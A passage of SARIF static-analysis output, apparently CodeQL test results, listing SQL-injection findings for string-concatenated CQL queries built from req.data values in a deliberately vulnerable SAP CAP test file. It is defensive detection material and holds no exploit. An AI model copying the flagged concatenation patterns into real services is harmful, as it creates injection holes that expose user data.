${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":400,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":401,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":415,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"3fb9a1da0acd43ae:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":414,"startColumn":58,"endColumn":60}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":414,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":415,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":422,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"80716f714482c84f:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":421,"startColumn":58,"endColumn":60}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":421,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":422,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":419,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":429,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"442267e255b8b54f:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":428,"startColumn":57,"endColumn":59}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":428,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":429,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":426,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":438,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"9e2cec8d31f74921:1","primaryLocationStartColumnFingerprint":"7"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":436,"startColumn":63,"endColumn":65}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":436,"startColumn":55,"endColumn":65}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":436,"startColumn":21,"endColumn":66}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":436,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":438,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":434,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":446,"startColumn":9,"endColumn":53}}}],"partialFingerprints":{"primaryLocationLineHash":"73ba3ff2097c8fd1:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":446,"startColumn":50,"endColumn":52}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":446,"startColumn":41,"endColumn":52}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":443,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":446,"startColumn":41,"endColumn":52}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":9,"endColumn":86}}}],"partialFingerprints":{"primaryLocationLineHash":"b6b098d76a485f57:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":57,"endColumn":63}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":41,"endColumn":63}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":83,"endColumn":85}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":71,"endColumn":85}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":459,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":41,"endColumn":63}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":462,"startColumn":71,"endColumn":85}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":486,"startColumn":9,"endColumn":55}}}],"partialFingerprints":{"primaryLocationLineHash":"930f7b78e736551b:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":486,"startColumn":52,"endColumn":54}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":486,"startColumn":43,"endColumn":54}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":483,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":486,"startColumn":43,"endColumn":54}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":495,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"cd8266cd9539b760:1","primaryLocationStartColumnFingerprint":"7"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":493,"startColumn":63,"endColumn":65}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":493,"startColumn":55,"endColumn":65}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":493,"startColumn":21,"endColumn":66}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":493,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":495,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":492,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":502,"startColumn":9,"endColumn":53}}}],"partialFingerprints":{"primaryLocationLineHash":"5298b55f76bd7434:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":502,"startColumn":50,"endColumn":52}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":502,"startColumn":41,"endColumn":52}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":500,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":502,"startColumn":41,"endColumn":52}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":9,"endColumn":86}}}],"partialFingerprints":{"primaryLocationLineHash":"f72e0c4e0d3cd372:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":57,"endColumn":63}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":41,"endColumn":63}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":514,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":83,"endColumn":85}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":516,"startColumn":71,"endColumn":85}},"message":{"text":"\"col1 = \" + 